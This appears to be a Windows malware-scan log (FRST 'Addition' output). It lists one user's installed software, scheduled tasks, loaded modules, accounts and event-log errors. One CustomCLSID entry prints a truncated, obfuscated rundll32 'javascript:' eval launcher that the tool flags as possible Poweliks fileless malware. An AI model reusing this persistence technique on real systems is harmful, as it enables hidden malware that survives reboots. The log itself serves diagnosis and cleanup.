InterVideo WinDVD 8 (HKLM-x32\...\InstallShield_{20471B27-D702-4FE8-8DEC-0702CC8C0A85}) (Version: 8.0.20.129 - InterVideo Inc.)
InterVideo WinDVD 8 (x32 Version: 8.0.20.129 - InterVideo Inc.) Hidden
iTunes (HKLM\...\{B8BA155B-1E75-405F-9CB4-8A99615D09DC}) (Version: 11.1.5.5 - Apple Inc.)
Java 7 Update 71 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F03217071FF}) (Version: 7.0.710 - Oracle)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Lenovo Fingerprint Software (HKLM\...\{2ED326C9-A4E6-4884-B3F0-9A6CFB0A1141}) (Version: 3.3.0.50 - AuthenTec, Inc.)
Lenovo Patch Utility 64 bit (Version: 1.4.0.4 - Lenovo Group Limited) Hidden
Lenovo Power Management Driver (HKLM\...\Power Management Driver) (Version: 1.67.04.05 - )
Lenovo System Interface Driver (HKLM\...\LENOVO.SMIIF) (Version: 1.05 - )
Lenovo System Update (HKLM-x32\...\{25C64847-B900-48AD-A164-1B4F9B774650}) (Version: 5.06.0016 - Lenovo)
Lenovo Welcome (HKLM-x32\...\Lenovo Welcome_is1) (Version: 2.0.020.0 - Lenovo)
Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)
Message Center Plus (HKLM-x32\...\{FD331A3B-F7A5-4C31-B8D4-DF413C85AF7A}) (Version: 2.0.0012.00 - Lenovo Group Limited)
Metric Collection SDK (x32 Version: 1.1.0005.00 - Lenovo Group Limited) Hidden
Metric Collection SDK 35 (x32 Version: 1.2.0001.00 - Lenovo Group Limited) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2003 Web Components (HKLM-x32\...\{90A40409-6000-11D3-8CFE-0150048383C9}) (Version: 11.0.8173.0 - Microsoft Corporation)
Microsoft Office 2007 Primary Interop Assemblies (HKLM-x32\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISER) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Live Add-in 1.5 (HKLM-x32\...\{F40BBEC7-C2A4-4A00-9B24-7A055A2C5262}) (Version: 2.0.4024.1 - Microsoft Corporation)
Microsoft Office Small Business Connectivity Components (HKLM-x32\...\{A939D341-5A04-4E0A-BB55-3E65B386432D}) (Version: 2.0.7024.0 - Microsoft Corporation)
Microsoft Research AutoCollage Touch 2009 (HKLM-x32\...\{1F8DA253-3C27-4B01-A63A-BA3533120833}) (Version: 2.00.2009 - Microsoft Research)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SQL Server 2005 (HKLM-x32\...\Microsoft SQL Server 2005) (Version:  - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft SQL Server Native Client (HKLM\...\{9ACF3FDB-C8E6-444C-8C64-13A221F7BFFD}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server Setup Support Files (English) (HKLM-x32\...\{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft SQL Server VSS Writer (HKLM\...\{B636C9B9-A3F2-4DCE-ADCC-72E095018385}) (Version: 9.00.5000.00 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x64 8.0.50727.4053 (HKLM\...\{B6E3757B-5E77-3915-866A-CCFC4B8D194C}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM-x32\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) - KB2467175 (HKLM\...\{aac9fcc4-dd9e-4add-901c-b5496a07ab2e}) (Version: 8.0.51011 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 ATL Update kb973924 - x64 9.0.30729.4148 (HKLM\...\{EE936C7A-EA40-31D5-9B65-8E3E089C3828}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x64 9.0.30729.5570 (HKLM\...\{8338783A-0968-3B85-AFC7-BAAE0A63DC50}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM-x32\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Mobile Broadband Connect (HKLM-x32\...\{5C111F14-D9BE-459D-B0B6-B4D082F03749}) (Version: 3.5.0006 - Lenovo)
Mozilla Firefox 22.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 22.0 (x86 en-US)) (Version: 22.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 22.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (HKLM-x32\...\{196467F1-C11F-4F76-858B-5812ADC83B94}) (Version: 4.30.2100.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2721691) (HKLM-x32\...\{355B5AC0-CEEE-42C5-AD4D-7F3CFD806C36}) (Version: 4.30.2114.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB2758694) (HKLM-x32\...\{1D95BA90-F4F8-47EC-A882-441C99D30C1E}) (Version: 4.30.2117.0 - Microsoft Corporation)
MSXML 4.0 SP3 Parser (KB973685) (HKLM-x32\...\{859DFA95-E4A6-48CD-B88E-A3E483E89B44}) (Version: 4.30.2107.0 - Microsoft Corporation)
On Screen Display (HKLM\...\OnScreenDisplay) (Version: 6.73.00 - )
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.8 - Google, Inc.)
Power Manager (HKLM-x32\...\{DAC01CEE-5BAE-42D5-81FC-B687E84E8405}) (Version: 6.66.3 - Lenovo Group Limited)
QuickTime 7 (HKLM-x32\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Registry Patch to Enable Maximum Power Saving on WiFi Adapters for Windows 7 (HKLM\...\EnablePS) (Version: 1.00 - )
Rescue and Recovery (HKLM-x32\...\{B383F243-0ABC-4E56-AA30-923B8D85076E}) (Version: 4.30.0025.00 - Lenovo Group Limited)
RICOH R5U8xx Media Driver ver.3.64.02 (HKLM-x32\...\{59F6A514-9813-47A3-948C-8A155460CC2A}) (Version: 3.64.02 - RICOH)
Roxio Creator Business Edition (HKLM-x32\...\{537BF16E-7412-448C-95D8-846E85A1D817}) (Version: 10.3 - Roxio)
Sanction Online Synchronization (HKLM-x32\...\Sanction Online Synchronization) (Version: 2.8 - SanctionII)
SanctionII (HKLM-x32\...\{135129F1-D9BF-42F4-9AF6-C1F5B10C3646}) (Version: 2.9.0 - Verdict Systems)
SHAREit (HKLM-x32\...\SHAREit_is1) (Version: 2.1.4.0 - Lenovo Group Limited)
Skype™ 4.0 (HKLM-x32\...\{24D753CA-6AE9-4E30-8F5F-EFC93E08BF3D}) (Version: 4.0.227 - Skype Technologies S.A.)
Sonic CinePlayer Decoder Pack (x32 Version: 4.3.0 - Sonic Solutions) Hidden
Sonic Icons for Lenovo (HKLM-x32\...\{B334D9AE-1393-423E-97C0-3BDC3360E692}) (Version: 2.0.0 - Lenovo)
SyncUploader (HKLM-x32\...\SyncUploader_is1) (Version:  - Synchron Voice and Video, Inc.)
System Migration Assistant (HKLM-x32\...\{8A4DB1CA-8206-4ADC-805C-66ACF1611DA3}) (Version: 6.00.0009 - Lenovo Group Limited.)
ThinkPad Bluetooth with Enhanced Data Rate Software (HKLM\...\{9E9D49A4-1DF4-4138-B7DB-5D87A893088E}) (Version: 6.2.0.9600 - Broadcom Corporation)
ThinkPad FullScreen Magnifier (HKLM\...\ThinkPad FullScreen Magnifier) (Version: 2.41 - )
ThinkPad Modem Adapter (HKLM\...\CNXT_MODEM_HDA_HSF) (Version: 7.80.5.0 - Conexant Systems)
ThinkPad UltraNav Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.19.14 - )
ThinkPad UltraNav Utility (HKLM-x32\...\{17CBC505-D1AE-459D-B445-3D2000A85842}) (Version: 2.13.0 - Lenovo)
ThinkVantage Access Connections (HKLM-x32\...\{8E537894-A559-4D60-B3CB-F4485E3D24E3}) (Version: 6.21 - Lenovo)
ThinkVantage Active Protection System (HKLM\...\{46A84694-59EC-48F0-964C-7E76E9F8A2ED}) (Version: 1.79.00.03 - Lenovo)
ThinkVantage Communications Utility (HKLM\...\{88C6A6D9-324C-46E8-BA87-563D14021442}_is1) (Version: 2.11.0.0 - Lenovo)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
Update for 2007 Microsoft Office System (KB967642) (HKLM-x32\...\{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{C444285D-5E4F-48A4-91DD-47AAAA68E92D}) (Version:  - Microsoft)
VC80CRTRedist - 8.0.50727.6195 (x32 Version: 1.2.0 - DivX, Inc) Hidden
VD64Inst (Version: 1.00.0000 - Roxio, Inc.) Hidden
Viewpoint Manager (Remove Only) (HKLM-x32\...\Viewpoint Manager) (Version:  - )
Viewpoint Toolbar (HKLM-x32\...\Viewpoint Toolbar) (Version:  - )
Visual C++ 8.0 Runtime Setup Package (x64) (HKLM-x32\...\{2FDBBCEA-62DB-45F4-B6E5-0E1FB2A1F29D}) (Version: 9.0.0.623 - AVG Technologies CZ, s.r.o.)
Visual Studio 2008 x64 Redistributables (HKLM-x32\...\{FCDBEA60-79F0-4FAE-BBA8-55A26C609A49}) (Version: 10.0.0.2 - AVG Technologies)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
VLC media player 1.1.11 (HKLM-x32\...\VLC media player) (Version: 1.1.11 - VideoLAN)
Webcam Video Capture 4.8.0 (HKLM-x32\...\Webcam Video Capture_is1) (Version:  - Webcam Simulator)
Windows Driver Package - AuthenTec Inc. (ATSwpWDF) Biometric  (07/07/2009 8.1.2.56) (HKLM\...\8E6CE26AD682E6D46DCCDD39CD93277A2EAF2449) (Version: 07/07/2009 8.1.2.56 - AuthenTec Inc.)
Windows Driver Package - Intel System  (06/04/2009 1.0.0.0002) (HKLM\...\E7B58217635B8F723D4744A328A4B3237DB35FA9) (Version: 06/04/2009 1.0.0.0002 - Intel)
Windows Driver Package - Lenovo 1.55 (08/18/2009 1.55) (HKLM\...\112AA64E0C8CC704E307FE914F7DEC1C0035598E) (Version: 08/18/2009 1.55 - Lenovo)
Windows Driver Package - Ricoh Company (rimsptsk) hdc  (09/03/2009 6.10.01.05) (HKLM\...\5F72B7FA1792CB768F6A46E18A9DAD0E1FE1C863) (Version: 09/03/2009 6.10.01.05 - Ricoh Company)
Windows Driver Package - Ricoh Company (rismxdp) hdc  (09/03/2009 6.10.01.05) (HKLM\...\1FBDB507F002A372EB195A0ACF6E2A2F9D34689E) (Version: 09/03/2009 6.10.01.05 - Ricoh Company)
Windows Driver Package - Ricoh Company MMC Host Controller (09/03/2009 6.10.01.05) (HKLM\...\D50474ACAF488895A3CE5D30373288EA6AD46EAA) (Version: 09/03/2009 6.10.01.05 - Ricoh Company)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-3094523011-22438472-3966868382-1003_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Charles\AppData\Roaming\Dropbox\bin\DropboxExt64.24.dll (Dropbox, Inc.)

==================== Restore Points  =========================

29-10-2014 15:14:51 Windows Update
29-10-2014 15:43:20 Removed AVG 2011
29-10-2014 15:47:21 Removed AVG 2011
29-10-2014 16:40:02 Installed AVG 2015
29-10-2014 16:40:39 Installed AVG 2015

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2009-06-10 16:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {10A8682B-DDFF-4C3F-94C8-6A7A09A3302A} - System32\Tasks\TVT\LenovoWERMonitor => C:\Program Files (x86)\Common Files\lenovo\SUP\sup_wermonitor_shim.exe [2014-09-01] ()
Task: {194D57F8-A314-4312-9BFC-D737D870ADCA} - System32\Tasks\Adobe online update program => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-08-21] (Adobe Systems Incorporated)
Task: {1A8F5B89-4B74-4727-9FF1-D36A55F8876D} - System32\Tasks\TVT\TVSUUpdateTask => C:\Program Files (x86)\Lenovo\System Update\tvsuShim.exe [2014-06-18] ()
Task: {30B5B2A6-F826-4565-92B4-8584E12E8F45} - System32\Tasks\TVT\ChangePWD => %RR%\rrcmd.exe
Task: {3844B652-7890-45EE-9DAB-B3EF1FBCD976} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 35 => C:\Program Files (x86)\Lenovo\Customer Feedback Program 35\Lenovo.TVT.CustomerFeedback.Agent35.exe [2014-05-30] (Lenovo)
Task: {4B40D368-AC49-4DF8-8F12-D98D41F7BC6C} - System32\Tasks\TVT\LaunchRnR => %RR%\rrcmd.exe
Task: {4C89DECB-CFF0-49E1-9246-7A1F8D318912} - System32\Tasks\PCDEventLauncher => C:\Program Files\PC-Doctor\sessionchecker.exe
Task: {54736606-5030-4C93-9F54-7EF26EFA8ADF} - System32\Tasks\1014avUpdateInfo => C:\ProgramData\Avg_Update_1014av\1014av_AVG-Secure-Search-Update.exe
Task: {574D660D-F9DC-47FF-8ADE-A988EF49C894} - System32\Tasks\Java Update Scheduler => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2014-09-26] (Oracle Corporation)
Task: {5F681B2F-3464-4EC5-A163-3652DE9BF2F3} - System32\Tasks\Synaptics TouchPad Enhancements => \Program Files\Synaptics\SynTP\SynTPEnh.exe [2014-07-28] (Synaptics Incorporated)
Task: {5FB2CA78-42E5-4700-BF1C-63DE7D977FBB} - System32\Tasks\Message Center plus => C:\Program Files (x86)\Lenovo\Message Center Plus\MCPLaunch.exe [2009-05-28] ()
Task: {6A771AE3-C6D9-4DF2-82A8-2C91380924E2} - System32\Tasks\HP online update program => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe [2010-03-12] (Hewlett-Packard)
Task: {733FF5EE-2271-4FB4-8543-C8B19A1E0A61} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2014-02-13] (Lenovo)
Task: {7F1B8DB2-F8ED-4F7C-94DF-5D944A62F08B} - System32\Tasks\PMTask => C:\Program Files (x86)\ThinkPad\Utilities\PwmIdTsv.exe [2014-09-10] (Lenovo Group Limited)
Task: {9711155E-F609-4429-9770-97F4DF706211} - System32\Tasks\HPCustParticipation HP Officejet Pro 8500 A910 => C:\Program Files\HP\HP Officejet Pro 8500 A910\Bin\HPCustPartic.exe [2010-06-14] (Hewlett-Packard Co.)
Task: {A552459E-DED6-4831-BA38-64227F19A6C6} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-18] (Google Inc.)
Task: {CCE4B7E1-8686-4DAD-8B00-7457398BE82F} - System32\Tasks\DiskUpdate => C:\SWTOOLS\OSFIXES\DISKUPDT\DiskUpdate.exe [2009-02-09] ()
Task: {D03BED1A-E95C-4789-A641-D20C22D268FD} - System32\Tasks\TVT\UpdateRnR => %TVTCOMMON%\Scheduler\tvtsetsched.exe
Task: {D6FD3C29-DF71-4519-B595-2EE6BBD3963C} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-18] (Google Inc.)
Task: {EE7ADEAE-84E3-49E2-BBA6-54A8AE27C911} - System32\Tasks\Google Updater and Installer => C:\Users\Charles\AppData\Local\Google\Update\GoogleUpdate.exe
Task: {F907CFFB-4805-4BBE-8877-7C9A90C1BEF2} - System32\Tasks\Divx online update program => C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe [2013-08-28] ()
Task: {F9A775E6-F9B2-4A78-85FE-CDE4DB114C90} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-24] (Adobe Systems Incorporated)
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2009-09-01 02:36 - 2009-09-01 02:36 - 00117760 _____ () C:\Windows\system32\DTS.exe
2009-09-21 18:04 - 2009-09-21 18:04 - 01501696 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll
2014-10-29 11:52 - 2014-10-29 11:51 - 00159768 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.10\loggingserver.exe
2009-12-02 13:59 - 2014-09-10 06:06 - 00104960 ____N () C:\Program Files (x86)\ThinkPad\Utilities\US\PWMRT64V.DLL
2010-01-02 09:42 - 2010-01-02 09:42 - 00098304 _____ () C:\Program Files (x86)\FileZilla FTP Client\fzshellext_64.dll
2009-07-01 21:54 - 2009-07-01 21:54 - 00173344 _____ () C:\Program Files\ThinkPad\Bluetooth Software\btkeyind.dll
2013-08-28 19:23 - 2013-08-28 19:23 - 01861968 _____ () C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
2014-10-29 11:52 - 2014-10-29 11:51 - 03037208 _____ () C:\Program Files (x86)\AVG Web TuneUp\vprot.exe
2014-02-06 01:52 - 2014-02-06 01:52 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-02-06 01:52 - 2014-02-06 01:52 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2014-03-14 17:47 - 2014-03-14 17:47 - 00092504 _____ () C:\Program Files (x86)\Lenovo\Access Connections\AcWrpc.dll
2014-10-29 11:52 - 2014-10-29 11:51 - 00519704 _____ () C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.10\log4cplusU.dll
2014-10-29 11:52 - 2014-10-29 11:51 - 01685528 _____ () C:\Program Files (x86)\AVG Web TuneUp\TBAPI.dll
2014-10-29 11:52 - 2014-10-29 11:51 - 40630296 _____ () C:\Program Files (x86)\AVG Web TuneUp\libcef.dll
2014-10-29 12:17 - 2014-10-29 12:17 - 00043008 _____ () c:\users\charles\appdata\local\temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp2qaslf.dll
2013-08-23 14:01 - 2013-08-23 14:01 - 25100288 _____ () C:\Users\Charles\AppData\Roaming\Dropbox\bin\libcef.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

AlternateDataStreams: C:\ProgramData\TEMP:40F038C5
AlternateDataStreams: C:\ProgramData\TEMP:C74D7A47

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

========================= Accounts: ==========================

Administrator (S-1-5-21-3094523011-22438472-3966868382-500 - Administrator - Disabled)
Charles (S-1-5-21-3094523011-22438472-3966868382-1003 - Administrator - Enabled) => C:\Users\Charles
Guest (S-1-5-21-3094523011-22438472-3966868382-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3094523011-22438472-3966868382-1005 - Limited - Enabled)

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================
Error: (10/29/2014 00:01:29 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: avgui.exe, version: 15.0.0.5557, time stamp: 0x544024b3
Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000
Exception code: 0xc0000005
Fault offset: 0x00000000
Faulting process id: 0x1788
Faulting application start time: 0xavgui.exe0
Faulting application path: avgui.exe1
Faulting module path: avgui.exe2
Report Id: avgui.exe3

Error: (10/29/2014 10:45:58 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.

Error: (10/29/2014 10:45:58 AM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.

Error: (10/28/2014 11:52:37 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 21450

Error: (10/28/2014 11:52:37 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 21450

Error: (10/28/2014 11:52:37 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (10/28/2014 11:46:09 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.17116, time stamp: 0x4a5bc6b7
Faulting module name: jscript9.dll, version: 10.0.9200.17116, time stamp: 0x541cda0b
Exception code: 0xc0000005
Fault offset: 0x000b9def
Faulting process id: 0xc4c
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (10/28/2014 10:07:56 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 10.0.9200.17116, time stamp: 0x4a5bc6b7
Faulting module name: ntdll.dll, version: 6.1.7601.18247, time stamp: 0x521ea8e7
Exception code: 0xc00000fd
Fault offset: 0x0002e04e
Faulting process id: 0x2278
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (10/19/2014 11:46:42 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program IEXPLORE.EXE version 10.0.9200.17116 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.

Process ID: 2614

Start Time: 01cfec207c6bd3ce

Termination Time: 22

Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Report Id:

